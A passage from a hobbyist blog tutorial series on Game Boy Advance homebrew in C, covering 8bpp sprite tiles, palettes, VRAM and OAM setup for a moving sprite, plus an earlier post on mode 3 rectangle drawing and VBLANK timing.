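static uint8_t TilePixel8bpp(const uint32_t tile[16], uint32_t x, uint32_t y)
{
    assert(x < 8 && y < 8);
    uint32_t word = tile[y * 2 + x / 4];
    return (uint8_t)((word >> ((x % 4) * 8)) & 0xFF);
}

/* Hypothetical helper: the i-th 15 bit colour in a palette packed two per word. */
static uint16_t PaletteEntry(const uint32_t *pal, uint32_t i)
{
    uint32_t word = pal[i / 2];
    return (uint16_t)((word >> ((i % 2) * 16)) & 0xFFFF);
}
```

So the 0x02020102 in the seventh row reads, left to right, as palette indices 2, 1, 2, 2.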

The __attribute__((aligned(4))) is a gcc attribute that forces your data to be aligned on 4 byte boundaries. I took it straight from the Tonc tutorial, which says:

As of devkitARM r19, there are new rules on struct alignments, which means that structs may not always be word aligned, and in the case of OBJ_ATTR structs (and others), means that [some] struct-copies … will not only be slow, they may actually break. For that reason, I will force word-alignment on many of my structs…

Since I don’t know enough to argue with that right now, I’m taking it on faith that this is still a good idea.

Now that we know what our sprite data is going to look like, let’s use a slightly larger data set. This is mostly to make sure that what we do later is correctly ordering the tiles in our sprite. If we used the example data above, we wouldn’t be able to verify this because we only had 1 tile. Here’s the sprite and data that I’m going to be using for the rest of the article:

const unsigned int spriteTiles[64] __attribute__((aligned(4)))=
{
    0x00000000,0x01000000,0x00000000,0x01010000,0x00000000,0x01010100,0x00000000,0x01010101,
    0x01000000,0x01010101,0x01010000,0x01010101,0x01010100,0x01010101,0x01010101,0x01010101,
    0x00000003,0x00000000,0x00000303,0x00000000,0x00030303,0x00000000,0x03030303,0x00000000,
    0x03030303,0x00000003,0x03030303,0x00000303,0x03030303,0x00030303,0x03030303,0x03030303,
    0x04040404,0x04040404,0x04040400,0x04040404,0x04040000,0x04040404,0x04000000,0x04040404,
    0x00000000,0x04040404,0x00000000,0x04040400,0x00000000,0x04040000,0x00000000,0x04000000,
    0x02020202,0x02020202,0x02020202,0x00020202,0x02020202,0x00000202,0x02020202,0x00000002,
    0x02020202,0x00000000,0x00020202,0x00000000,0x00000202,0x00000000,0x00000002,0x00000000,
};

const unsigned int spritePal[3] __attribute__((aligned(4)))=
{
    0x001E0000,0x03E07FFF,0x00007C1F,
};

If you take a look at this larger sprite data, you’ll notice that it’s stored as a sequential array of 8x8 tiles, that is, the 3rd 32 bit value isn’t the first four pixels of the top right tile, it’s the first four pixels of the second row of the top left tile. This is to make things easier to get into VRAM, since we have to upload tiles, not whole images. Mercifully, there’s a command line tool that I’ll link later that will convert images to this format for us, so we don’t have to try to author images like this.
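To spell out that ordering, here’s a sketch of how you could find the 32 bit value that holds a given pixel of the original image. TiledWordIndex is a hypothetical helper (not part of the project), and it assumes 8bpp data with the tiles stored left to right, top to bottom, which is how the array above appears to be laid out.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helper: index of the 32 bit word holding pixel (x, y) of an
   8bpp image stored tile by tile. widthInPixels must be a multiple of 8. */
static uint32_t TiledWordIndex(uint32_t x, uint32_t y, uint32_t widthInPixels)
{
    assert(widthInPixels % 8 == 0 && x < widthInPixels);
    uint32_t tilesPerRow = widthInPixels / 8;
    uint32_t tile = (y / 8) * tilesPerRow + (x / 8);   /* which 8x8 tile */
    uint32_t wordInTile = (y % 8) * 2 + (x % 8) / 4;   /* 2 words per tile row */
    return tile * 16 + wordInTile;                     /* 16 words per tile */
}
```

For our 16 pixel wide sprite, pixel (0,1) lands in word 2 (the 3rd value), while pixel (8,0), the start of the top right tile, doesn’t show up until word 16.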

For readability’s sake, I’m going to put the above block of code into its own .c file, that I’m going to call sprite.c. I’m also going to create sprite.h, which looks like this:

#ifndef SPRITE_H
#define SPRITE_H

#define spriteTilesLen 256 //size in bytes
extern const unsigned int spriteTiles[64];

#define spritePalLen 12
extern const unsigned int spritePal[3];

#endif

I’m using 32 bit values to store everything, because when I tried to use 16 bit values, I ended up needing to pad my sizes in the header to the nearest multiple of 8 (so spritePalLen had to be 16), or else some data wouldn’t transfer. I’m not entirely sure why that is (or why making things ints fixed that), but I decided I’d rather not have to remember to do that, and chose to stick with 32 bit values even though they make the data slightly harder to read.

Getting All This Into VRAM

We have sprite data and palette data ready to go, but as we discussed earlier, we’re going to need to get this data into the proper parts of memory. Specifically, we’ll need to add the palette values to our larger 256 colour palette memory, upload tile data to tile memory, and then create a sprite that references those tiles.

Let’s start with the palette memory:

#include <string.h> //for memcpy
#include "sprite.h"

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

#define MEM_PALETTE   ((uint16*)(0x05000200))
void UploadPaletteMem()
{
    memcpy(MEM_PALETTE, spritePal, spritePalLen);

}

This is pretty straightforward, the only thing to note is that in other articles, what I’m calling MEM_PALETTE here is usually called MEM_OBJ_PAL, or something similar. This is because palette memory on the GBA is divided into two sections, but we’re only using one of them today, so for simplicity’s sake, I’m just calling it MEM_PALETTE and pretending that’s all there is to it.

Next we need to upload our tile memory, this is a bit less straightforward:

typedef uint32 Tile[16];
typedef Tile TileBlock[256];

#define MEM_VRAM        ((volatile uint32*)0x06000000)
#define MEM_TILE        ( (TileBlock*)MEM_VRAM )

void UploadTileMem()
{
    memcpy(&MEM_TILE[4][1], spriteTiles, spriteTilesLen);
}

To understand what’s going on here, we need to know a bit more about how tiles are stored in VRAM. In tiled video modes, VRAM is used to store tile data, and that data is arranged in 16kb blocks, called “tile blocks” or (more confusingly) “charblocks.” Since the GBA has 96kb of VRAM, this gives us 6 tile blocks total.

The first four of these tile blocks are reserved for backgrounds (which we aren’t delving into today), and the remaining two are for sprite tiles. This means that when we want to put a sprite tile into memory, the first possible memory slot for us is at MEM_VRAM + 64 KB (that is, + 65536 bytes, since each tile block is 16384 bytes). This gives us a memory address of 0x6010000, but it’s much easier to get at individual tile addresses using the array notation you see here.
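If you’re curious what the array notation works out to, the arithmetic is short. This is just a desktop-side sketch, and TileAddress is a hypothetical helper of mine. It assumes the 8bpp Tile type from above, where each tile is 64 bytes.

```c
#include <assert.h>
#include <stdint.h>

#define VRAM_BASE        0x06000000u
#define TILEBLOCK_BYTES  0x4000u   /* 16 KB per tile block */
#define TILE8_BYTES      64u       /* one 8bpp tile: 8 * 8 pixels, 1 byte each */

/* Hypothetical helper: the address that &MEM_TILE[block][tile] refers to. */
static uint32_t TileAddress(uint32_t block, uint32_t tile)
{
    assert(block < 6 && tile < 256);
    return VRAM_BASE + block * TILEBLOCK_BYTES + tile * TILE8_BYTES;
}
```

TileAddress(4, 0) is the 0x6010000 mentioned above, and the [4][1] slot we copy into sits 64 bytes after it.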

I’m putting my sprite into [4][1] instead of [4][0] because writing into [4][0] ended up putting some weird artifacts on the top left corner of my screen. I’m not sure why that is yet, and I haven’t found another example of using 8bpp sprites online to see what they’re doing, so I’m going to leave it for now (if you know what’s going on, shoot me a message on Twitter).

The last thing we need to get into memory is a description of our sprite (since we need to know how to combine all these tiles we just put into VRAM). To do that, we’re going to define an Object.

GBA Objects Aren’t “Objects”

As mentioned earlier, a GBA Object is NOT an OOP style Object. Instead, they’re simply collections of tiles which can be transformed / drawn without needing to clear where they were. If you remember from last week, we had to do all our own clearing. Objects relieve us of that duty.

Unfortunately, creating an Object is a bit of an arcane exercise, so bear with me here. The first thing we need to do is to define the Object data structure, and where object memory lives:

typedef struct ObjectAttributes {
    uint16 attr0;
    uint16 attr1;
    uint16 attr2;
    uint16 pad;
} __attribute__((packed, aligned(4))) ObjectAttributes;

#define MEM_OAM  ((volatile ObjectAttributes *)0x07000000)

As you may have guessed from above, you don’t technically store objects in memory (although you’re free to call your struct whatever you want), instead we store what’s referred to as “Object Attributes.” These structs are stored in “Object Attribute Memory”, or OAM.

There’s a lot of information packed into the three uint16 variables in the ObjectAttributes struct, and it’s easy to get lost. In the interest of being the “bare minimum” you need to move a sprite around the screen, I’m only going to talk about the bits that we’re going to use today. If you want a more granular look at things, Tonc does an excellent job at explaining what every bit does.

It’s easiest to describe how these variables work in a table, so here’s attr0

Attr 0	0x FEDC BA98 7654 3210
FE	Shape of Sprite: 00 = Square, 01 = Wide, 10 = Tall
D	Colour Mode: 0 = 4bpp, 1 = 8bpp
C	Not used today
BA	Not used today
98	Not used today
7654 3210	Y Coordinate

Our sprite is an 8bpp, square sprite. Using this table, if we wanted to define a sprite like that, and place it at a Y coordinate of 50, we could do so like this:

volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];
spriteAttribs->attr0 = 0x2032;

Here’s what we need in Attr1:

Attr 1	0x FEDC BA98 7654 3210
FE	Sprite Size (discussed below)
DCBA9	Not Used Today
8 7654 3210	X coordinate

Sprite size is weird on the GBA. A sprite can be a maximum of 64x64, but doesn’t necessarily have to be square, meaning that what size your sprite is depends both on the value in FE of Attribute 1, and on the shape you defined in Attribute 0. They work together like this:

	Size 00	Size 01	Size 10	Size 11
Shape 00	8x8	16x16	32x32	64x64
Shape 01	16x8	32x8	32x16	64x32
Shape 10	8x16	8x32	16x32	32x64

It certainly has some logical consistency to it, but I still find it really cumbersome to figure out what I need. In any case, given that we defined a square sprite in attribute 0, if we wanted to define a 16x16 sprite (and we do), at an x coordinate of 100, it would look like this:

volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

spriteAttribs->attr0 = 0x2032; // 8bpp tiles, SQUARE shape
spriteAttribs->attr1 = 0x4064;
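Since I find the size table cumbersome, here’s one way you might turn it into a lookup instead of memorizing it. This is only a sketch: ObjDimensions and ObjSize are names I made up, and the sizes are written as width x height in pixels.

```c
#include <assert.h>
#include <stdint.h>

typedef struct ObjDimensions {
    uint8_t width;
    uint8_t height;
} ObjDimensions;

/* Hypothetical helper: look up sprite dimensions in pixels from the shape
   bits (attr0, FE) and the size bits (attr1, FE). Shape 11 is not valid. */
static ObjDimensions ObjSize(uint32_t shape, uint32_t size)
{
    static const ObjDimensions table[3][4] = {
        { { 8,  8}, {16, 16}, {32, 32}, {64, 64} },  /* shape 00 */
        { {16,  8}, {32,  8}, {32, 16}, {64, 32} },  /* shape 01 */
        { { 8, 16}, { 8, 32}, {16, 32}, {32, 64} },  /* shape 10 */
    };
    assert(shape < 3 && size < 4);
    return table[shape][size];
}
```

ObjSize(0, 1) gives the 16x16 sprite we’re about to use.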

The last attribute we need to define is maybe the most important, since it tells the hardware where to look for the tiles in VRAM:

Attr 2	0x FEDC BA98 7654 3210
FEDC	Not Used Today
BA	Not Used Today
98 7654 3210	First Tile Index

It’s worth noting that some of these tables are different when you’re working in 4bpp mode. Eventually I’ll end up using all the options available for sprite drawing, but today I just want to move a thing across my screen.

Combining everything we just talked about: defining our 16x16, 8bpp sprite, at location 100,50, and starting with the tile at index [4][1] looks like this:

volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

spriteAttribs->attr0 = 0x2032; // 8bpp tiles, SQUARE shape
spriteAttribs->attr1 = 0x4064; // 16x16 size when using the SQUARE shape
spriteAttribs->attr2 = 2;      // Start at [4][1]

You’ll notice that the index we pass to attr2 isn’t 1, which is what you’d expect to see passed there since we’re at element 1 of the array. However, the index stored in attr2 assumes that you’re using 4bpp sprites. If you’re using 8bpp like us, you need to go up by 2 indices every time you want to access the next tile.
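If the magic numbers bother you, the three values can be assembled from their fields instead. Here’s a minimal sketch of that, assuming only the bits covered in the tables above (everything marked "not used today" stays 0). MakeAttr0, MakeAttr1 and MakeAttr2For8bpp are hypothetical helpers of mine, not part of the project.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical helpers that assemble the three attribute values from the
   fields discussed above; every "not used today" bit is left at 0. */
static uint16_t MakeAttr0(uint32_t y, uint32_t is8bpp, uint32_t shape)
{
    assert(y < 256 && is8bpp < 2 && shape < 3);
    return (uint16_t)((shape << 14) | (is8bpp << 13) | y);
}

static uint16_t MakeAttr1(uint32_t x, uint32_t size)
{
    assert(x < 512 && size < 4);
    return (uint16_t)((size << 14) | x);
}

/* For 8bpp sprites the index counts in 4bpp-sized steps, so tile n is 2 * n. */
static uint16_t MakeAttr2For8bpp(uint32_t tile)
{
    assert(tile < 512);
    return (uint16_t)(tile * 2);
}
```

MakeAttr0(50, 1, 0), MakeAttr1(100, 1) and MakeAttr2For8bpp(1) produce the same 0x2032, 0x4064 and 2 that we wrote out by hand.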

With that set up, we actually have (almost) everything we need to draw our sprite. We just need to set a few more flags on our display control register:

#define REG_DISPLAYCONTROL     *((volatile uint16*)(0x04000000))

#define VIDEOMODE_0    0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040

int main()
{
    ...
    REG_DISPLAYCONTROL =  VIDEOMODE_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;
    ...
}

As the names suggest, these flags tell the hardware to enable support for objects, and to expect tile memory to be stored as a 1D array. I’ve already covered all the info needed to understand what these mean, so hopefully they make sense now. If you’re confused about the 1D array flag, know that the only other option for tile mapping is in a 2D array, but in the interest of brevity (and imo, coding sanity), I’ve omitted that from this article. As usual, Tonc covers it very well if you’re interested in knowing more.

Putting It All Together

All that’s left is to put together what we already have. Aside from the sprite include files I added earlier, all the code we need to move a sprite across the screen can easily fit below:

#include "sprite.h"
#include <string.h>

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

typedef uint32 Tile[16];
typedef Tile   TileBlock[256];

#define VIDEOMODE_0    0x0000
#define ENABLE_OBJECTS 0x1000
#define MAPPINGMODE_1D 0x0040

#define REG_VCOUNT              (*(volatile uint16*) 0x04000006)
#define REG_DISPLAYCONTROL      (*(volatile uint16*) 0x04000000)

#define MEM_VRAM      ((volatile uint16*)0x6000000)
#define MEM_TILE      ((TileBlock*)0x6000000 )
#define MEM_PALETTE   ((uint16*)(0x05000200))
#define SCREEN_W      240
#define SCREEN_H      160

typedef struct ObjectAttributes {
    uint16 attr0;
    uint16 attr1;
    uint16 attr2;
    uint16 pad;
} __attribute__((packed, aligned(4))) ObjectAttributes;

#define MEM_OAM       ((volatile ObjectAttributes *)0x07000000)

static inline void vsync()
{
    while (REG_VCOUNT >= 160);
    while (REG_VCOUNT < 160);
}

int main()
{
    memcpy(MEM_PALETTE, spritePal,  spritePalLen );
    memcpy(&MEM_TILE[4][1], spriteTiles, spriteTilesLen);

    volatile ObjectAttributes *spriteAttribs = &MEM_OAM[0];

    spriteAttribs->attr0 = 0x2032; // 8bpp tiles, SQUARE shape, at y coord 50
    spriteAttribs->attr1 = 0x4064; // 16x16 size when using the SQUARE shape
    spriteAttribs->attr2 = 2;      // Start at [4][1] (8bpp tiles count in steps of 2)

    REG_DISPLAYCONTROL =  VIDEOMODE_0 | ENABLE_OBJECTS | MAPPINGMODE_1D;

    int x = 0;
    while(1)
    {
        vsync();
        x = (x+1) % (SCREEN_W);
        spriteAttribs->attr1 = 0x4000 | (0x1FF & x);

    }
    return 0;
}

Voila! You are now in possession of your very own moving sprite. Notice that unlike last week, we don’t have to do any work to clear the screen (thanks objects!), and all it takes to move the sprite is to update the appropriate attribute.

Finally, I promised to link you to the tools that I used to generate the sprites, both of which were written by the author of the Tonc tutorial. For bitmap editing (and bitmap palette editing), I used Usenti, and for exporting that bitmap to the .c code we looked at, I used Grit. Both tools are very straightforward, but definitely don’t overlook Grit’s GUI client (helpfully called “WinGrit”), it makes life much easier.

That’s it for today! Hope you had as much fun as I did! As always, if you want to say hi, I’m most accessible on Twitter. Have a good one!

GBA By Example - Drawing and Moving Rectangles

2017-03-28T00:00:00+00:00

The idea of making something for GameBoy has always appealed to me. Not only was it my platform of choice when I was a little kid, but naively, it has always looked like the relaxing combination of hardware simple enough to really understand, an OS (or BIOS) that gets out of your way (no firmware updates), and a platform that’s open enough to not need to deal with jailbreaking the device. Plus, the GBA could do 3D!

I’ve had a Krikzz Everdrive sitting around for a few months that I’ve meant to play with, and I finally had some time during my vacation last week to try it out. Behold the fruits of my labors:

(I on the other hand, cannot make the GBA do 3D yet)

So, it isn’t exactly impressive, but it was a lot of fun, and I definitely want to play around with the GBA some more.

One of the great things about being late to the dev scene for a console is that lots of people have come before you and written great material, especially GBATek and the Tonc Tutorials. But what I really wish existed was a GBA version of the excellent Metal By Example, which does an amazing job at easing into the nuts and bolts of the Metal API, by presenting each step as a small, buildable example.

Since that doesn’t exist for the GBA yet, I’m here to make that happen. To that end: this article is going to focus on the absolute minimum you need to know to draw and move rectangles around the screen on the GBA. You can do a lot with just that, and it feels great to see something moving on screen, so let’s get started!

Setting Up Your Dev Environment

First things first, we’re going to need a way to run our project. As mentioned, I have an Everdrive GBA cart so I could put my stuff on actual hardware, but that’s completely overkill for this tutorial (and to be honest, most of the time it was faster to work in an emulator anyway). I downloaded VisualBoyAdvance to work with, which is a great open source emulator, but there are lots out there to choose from, and any of them should be able to do what we need them to do.

Secondly, we’re going to need a way to build our projects. There are fewer options here, and the one that I found the best was DevKitPro. This has tools for lots of platforms, but make sure you enable the GBA and ARM components when you’re installing. Once you have that installed, it’s time to set up your project. The easiest thing for me was to copy one of the makefiles from the devkitpro examples folder and simply change the name of the “sources” folder to the one that I was using for my build:

I placed that make file in the same directory as the folder which held my code (which was the root dir of my project). With that, all it took was a simple call to make to get a fully working GBA game!

If you’re dubious about this working, this gist has a minimal gba example which will clear the screen red. Try putting that in your source directory and running make, and then opening the result in your emulator of choice. If you see a red screen, everything is working as intended.

Setting a Video Mode

Ok, so now we know our build process works, it’s time to dig into the nuts and bolts of building something for gameboy!

The first thing we need to do is pick a video mode to use. The GBA has six different modes (0 through 5) that control how you draw to the screen. Eventually, I’m sure it will be good to know how to use each one of these modes, but mode 3 seemed like the easiest to use, so that’s where I started. What this means is that our screen buffer is going to be a 240 x 160, 16 bit buffer. It’s also going to be single-buffered, so if we want to change the pixel at (50,50) on the screen, all we need to do is go to that point in video memory and change the value there.

Now here’s where things started feeling weird to me: in order to set the gameboy to video mode 3, we need to set a display control byte to the correct value. I expected that this meant there’d be a function to call, but there isn’t. What we need to do is go to memory address 0x04000000, and set the correct video mode flag there. It turns out that GBA dev is full of this paradigm - the hardware is simple enough that a lot of things can be controlled by a specific bit or byte being set, and rather than expose this via a system call, you just set the value directly at the appropriate address. Ahh, the wonders of old school tech.

Predictably, to set the hardware to video mode 3, we need to set the display control register (0x04000000) to a value of 3 (more specifically 0x0003). We also need to turn on a background layer. Bit 0x0400 of the same register enables background 2, which is the layer the bitmap modes draw to, so it needs to be set in order for anything to show up. Backgrounds matter a lot more in the other video modes, but for mode 3 that’s all we need to know. (I’ve called this flag BGMODE_2 in my code.)

We can set these values like this:

typedef unsigned int    uint32;

#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3         0x0003
#define BGMODE_2            0x0400

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_3 | BGMODE_2;
    while(1){}
}

A lot of tutorials use more concise constant names, and while they may be more standard (like REG_DISPCNT), I found it much easier to use more descriptive names. Additionally, you may be wondering why our pointer to the REG_DISPLAYCONTROL address needs to be marked “volatile.” This tells the compiler that even though nothing in our code is reading from this address, we don’t want it to optimize away the logic that sets its value (since the hardware is going to look at this address).

You probably also noticed that I defined my own convenience type for unsigned ints. Since we’re going to do a lot of writing values directly to memory addresses, the size of our integers matters a lot, and typing “unsigned int” out all the time will drive you mad.

Lastly, you definitely noticed that the program immediately enters an infinite while loop. We really, really, don’t want to have our main function exit, since that would mean the gameboy game would exit, and what that means is undefined. So instead of a traditional game loop with a flag to control when to exit, game loops on GBA will always be infinite.

If you run this, it will (unsurprisingly) do nothing, so maybe we should tell it to do something?

Drawing To The Screen

Like I mentioned before, in mode 3, we don’t need to worry about managing multiple color buffers, or working with tile maps, or anything else. All we need to do is set the pixels in video memory to what we want. This is virtually identical to what we had to do previously to set the video mode, except that the screen buffer starts at memory address 0x06000000:

typedef unsigned char      uint8;
typedef unsigned short     uint16;
typedef unsigned int       uint32;

#define REG_DISPLAYCONTROL *((volatile uint32*)(0x04000000))
#define VIDEOMODE_3         0x0003
#define BGMODE_2            0x0400

#define SCREENBUFFER        ((volatile uint16*)0x06000000)
#define SCREEN_W            240
#define SCREEN_H            160

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_3 | BGMODE_2;

    for (int i = 0; i < SCREEN_W * SCREEN_H; ++i)
    {
    	SCREENBUFFER[i] = 0xFFFF;
    }

    while(1){}
    return 0;
}

Running this now will get you a nice white screen. Progress! Note that we don’t dereference the pointer to the screen buffer in the macro, because we want to index into the screen buffer array to set pixels that aren’t the top left corner of the screen (on GBA, the Y axis increases as it gets lower on screen), and to do that, we need a pointer to the beginning of the array.

The only sorta weird thing about this is how the GBA stores colours. Earlier I said that Mode 3 meant our screen was 16 bit color, but that’s not really true. The GBA actually uses 15 bit color, leaving the first bit alone. In the above example, we didn’t need to know this, because we were just setting things to pure white, but assuming you’ll want to write a colour that isn’t black or white, the following function comes in handy:

inline uint16 MakeCol(uint8 red, uint8 green, uint8 blue)
{
    return red | green << 5 | blue << 10;
}

To give credit where it’s due, the above function comes from the Tonc tutorial. As you may have guessed from the above, colours on the GBA are stored as 16 bit integers, with the data laid out like this:

[unused bit] BBB BBGG GGGR RRRR
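To make that layout a bit more concrete, here’s a small sketch in plain C (nothing GBA specific, so you can run it on your PC) that packs colours with the same shifts as MakeCol and pulls the channels back out again. The ColRed, ColGreen and ColBlue helpers are names I made up for illustration, they aren’t from Tonc.

```c
#include <stdint.h>

typedef uint8_t  uint8;
typedef uint16_t uint16;

/* Same packing as MakeCol: red in bits 0-4, green in bits 5-9, blue in bits 10-14. */
static inline uint16 MakeCol(uint8 red, uint8 green, uint8 blue)
{
    return (uint16)(red | (green << 5) | (blue << 10));
}

/* Hypothetical helpers (not from Tonc) that pull each 5 bit channel back out. */
static inline uint8 ColRed(uint16 c)   { return (uint8)(c & 0x1F); }
static inline uint8 ColGreen(uint16 c) { return (uint8)((c >> 5) & 0x1F); }
static inline uint8 ColBlue(uint16 c)  { return (uint8)((c >> 10) & 0x1F); }
```

With this layout, MakeCol(31,0,0) is 0x001F, MakeCol(0,31,0) is 0x03E0, MakeCol(0,0,31) is 0x7C00, and pure white is 0x7FFF, with the top bit left at zero.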

Note that each colour getting only 5 bits means that channels can only store 1 of 32 values (0 - 31), so passing a number outside this range to the function is essentially useless. I’ve seen some other tutorials recommend AND-ing the passed in channel values with 0x1F to clamp them to a 5 bit value, but I feel like ensuring the inputs to your functions are correct is a problem for an assert in a debug build and not runtime cycles. That being said, how to debug a GBA game is beyond the scope of what I want to talk about today (and to be honest, outside the scope of what I know how to do right now), so maybe AND-ing isn’t such a bad idea:

inline uint16 MakeCol(uint8 red, uint8 green, uint8 blue)
{
    return (red & 0x1F) | (green & 0x1F) << 5 | (blue & 0x1F) << 10;
}

You can use the above function to make any colour your screen is capable of displaying, but right now all we have is the logic to clear the screen to a colour. Let’s do something a bit more interesting and write the (hopefully) extremely simple function for drawing differently sized rectangles:

void drawRect(int left, int top, int width, int height, uint16 clr)
{
    for (int y = 0; y < height; ++y)
    {
        for (int x = 0; x < width; ++x)
        {
    	   SCREENBUFFER[(top + y) * SCREEN_W + left + x] = clr;
        }
    }
}

That’s much more useful! Now we can make vertical and horizontal lines, and rectangles of all shapes and sizes. You can even divide up the screen into 8x8 blocks and set each one to something different if you feel like it!

(I did)
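One thing drawRect doesn’t do is check its arguments, so a rectangle that hangs off the right edge of the screen will spill onto the next row, and one that hangs off the bottom will write past the end of the screen buffer. Here’s a rough sketch of a clipped variant. To keep it testable off-device I’ve made it take the target buffer as a parameter (that’s my own change, the version above writes to SCREENBUFFER directly), and the name drawRectClipped is made up.

```c
#include <stdint.h>

typedef uint16_t uint16;

#define SCREEN_W 240
#define SCREEN_H 160

/* Hypothetical clipped variant of drawRect. `buffer` must hold
   SCREEN_W * SCREEN_H pixels; on hardware you would pass SCREENBUFFER. */
void drawRectClipped(volatile uint16 *buffer, int left, int top,
                     int width, int height, uint16 clr)
{
    int right  = left + width;
    int bottom = top + height;

    /* Clamp the rectangle to the visible screen. */
    if (left < 0)          left = 0;
    if (top < 0)           top = 0;
    if (right > SCREEN_W)  right = SCREEN_W;
    if (bottom > SCREEN_H) bottom = SCREEN_H;

    /* A rectangle that is entirely off screen leaves both loops empty. */
    for (int y = top; y < bottom; ++y)
    {
        for (int x = left; x < right; ++x)
        {
            buffer[y * SCREEN_W + x] = clr;
        }
    }
}
```

The clamping costs a handful of comparisons per call, which is nothing next to the pixel writes, so it’s a cheap safety net while you’re still figuring out your coordinates.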

But this is only useful if you want to make static images appear on your screen, and the title of this post also promised that our rectangles would move, so it’s time to move inside our infinite game loop and do some work there.

The GBA Drawing Process

Before we get to the fun stuff though, I need to talk briefly about how the GBA takes the data in the SCREENBUFFER array and draws it on the screen.

The GBA draws each row of the screen sequentially, and serially (one after the other). Updating a pixel on the screen takes the hardware 4 cycles, which means that updating a single 240 pixel row of the screen takes 4 * 240 cycles. At the end of each row, the hardware pauses briefly. This pause is known as the Horizontal Blank, or HBLANK, and takes as long as it would take the hardware to update another 68 pixels (272 cycles).

This process continues for each row on the screen. Once all the rows have been updated, there is a larger pause called the Vertical Blank, or VBLANK. This pause lasts as long as it would take the hardware to update 68 more rows of pixels (including the HBLANK time). This works out to 4 * (240 + 68) * 68, or 83776 cycles. These numbers will be very important in more complex projects, but are included here just because I thought it was good info to know.
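If you want to check that arithmetic (or work out a per-frame cycle budget), here’s the same math written as C constants. A row is 240 pixels wide plus 68 pixels’ worth of HBLANK, and there are 160 visible rows plus 68 rows’ worth of VBLANK. The one number here that isn’t from the text above is the CPU clock: I’m assuming the GBA’s 16.78 MHz (2^24 Hz) clock to turn cycles into frames per second.

```c
/* Display timing figures from the text, expressed as constants. */
enum
{
    CYCLES_PER_PIXEL = 4,
    VISIBLE_PIXELS   = 240,  /* pixels drawn per row */
    HBLANK_PIXELS    = 68,   /* HBLANK length, measured in pixels */
    VISIBLE_ROWS     = 160,
    VBLANK_ROWS      = 68,   /* VBLANK length, measured in rows */

    CYCLES_PER_ROW   = CYCLES_PER_PIXEL * (VISIBLE_PIXELS + HBLANK_PIXELS), /* 1232 */
    CYCLES_VDRAW     = CYCLES_PER_ROW * VISIBLE_ROWS,                       /* 197120 */
    CYCLES_VBLANK    = CYCLES_PER_ROW * VBLANK_ROWS,                        /* 83776 */
    CYCLES_PER_FRAME = CYCLES_VDRAW + CYCLES_VBLANK                         /* 280896 */
};

/* Assumption: the GBA CPU runs at 2^24 Hz. This isn't stated in the text above. */
#define CPU_HZ 16777216.0

/* Refresh rate implied by the numbers above, in frames per second. */
double framesPerSecond(void)
{
    return CPU_HZ / CYCLES_PER_FRAME;
}
```

Under that assumption the refresh rate comes out just shy of 60 fps, and VBLANK is a bit under a third of each frame.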

This drawing process is going to occur no matter what our code is doing, without us having to tell the hardware to do it, which means that any code which modifies the data in the SCREENBUFFER array, should do so in the VBLANK pause. Otherwise, we could update the screen halfway through it being drawn, which would lead to tearing artifacts where part of the screen is displaying 1 frame behind other parts.

This means that we need to be able to detect when we’re in VBLANK! There’s two ways to do this, the proper way and the easy way. For my first attempt at GBA dev, I chose the easy way:

#define REG_VCOUNT      (* (volatile uint16*) 0x04000006)
inline void vsync()
{
  while (REG_VCOUNT >= 160);
  while (REG_VCOUNT < 160);
}

The value at REG_VCOUNT holds the index of the current row being drawn to by the hardware. The above function simply waits until we are at an index that is beyond the height of the screen (160). If called inside VBLANK, it will block until the next VBLANK is hit. Is this awful and complete overkill? YES! It also works pretty nicely for something as simple as a moving rectangle game.

It’s worth noting that you are free to do any calculations you want during VDRAW (what it’s called when the hardware is not in VBLANK), as long as you don’t update the values in the screen buffer.

Using the above vsync() function, we can finally add some animation, since the function above not only blocks until VBLANK, but will also block until next frame:

int main()
{
    REG_DISPLAYCONTROL = VIDEOMODE_3 | BGMODE_2;

    for (int i = 0; i < SCREEN_W * SCREEN_H; ++i)
    {
    	SCREENBUFFER[i] = MakeCol(0,0,0);
    }

    int x = 0;
    while(1)
    {
        vsync();
        drawRect(x % SCREEN_W, (x / SCREEN_W) * 10, 10, 10,MakeCol(31,31,31));
        x += 10;
    }

    return 0;
}

If you run this, you’ll slowly see your screen get filled, 10 pixels at a time, by a lovely white color:

You’ll notice that the screen doesn’t do any clearing for us at all. This is actually good news, since writing to the SCREENBUFFER array takes up cycles, and we don’t want our hardware using up any of our precious CPU time that it doesn’t have to. This means that if you wanted to say, move a rectangle across the screen instead of having the screen fill up, you also need to write black to the previous location of the rectangle:

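while(1)
{
    vsync();

    // wrap before x reaches the row just below the bottom of the screen
    if (x >= SCREEN_W * (SCREEN_H/10)) x = 0;

    // erase last frame's rectangle (right after a wrap, that's the final cell)
    int last = (x ? x : SCREEN_W * (SCREEN_H/10)) - 10;
    drawRect(last % SCREEN_W, (last / SCREEN_W) * 10, 10, 10,MakeCol(0,0,0));

    drawRect(x % SCREEN_W, (x / SCREEN_W) * 10, 10, 10,MakeCol(31,31,31));
    x += 10;
}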

You’ll notice I also added a bit of logic to wrap the x value when it goes off the end of the screen. This gives you a lovely white rectangle which traverses each row on your screen. If it looks like the rectangle is skipping frames, make sure the “frameskip” option in your emulator isn’t turned on.

Note that the gif above IS skipping frames, because my gif capturing program only supports up to 30 fps, so if your game is as choppy as the gif, your frameskip option is turned on.

Other than that, you should be good to go!
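If the x % SCREEN_W and (x / SCREEN_W) * 10 math in those drawRect calls looks a bit magic, here it is pulled out into a tiny helper you can run on your PC. The CellPos struct and the cellFromCounter name are made up for this sketch.

```c
#define SCREEN_W 240
#define SCREEN_H 160
#define CELL     10

typedef struct { int left; int top; } CellPos;

/* Maps the running counter x (always a multiple of CELL) to the top-left
   pixel of the 10x10 cell it refers to, the same way the drawRect calls do. */
CellPos cellFromCounter(int x)
{
    CellPos p;
    p.left = x % SCREEN_W;           /* horizontal position within the row of cells */
    p.top  = (x / SCREEN_W) * CELL;  /* which row of cells, times the cell height */
    return p;
}
```

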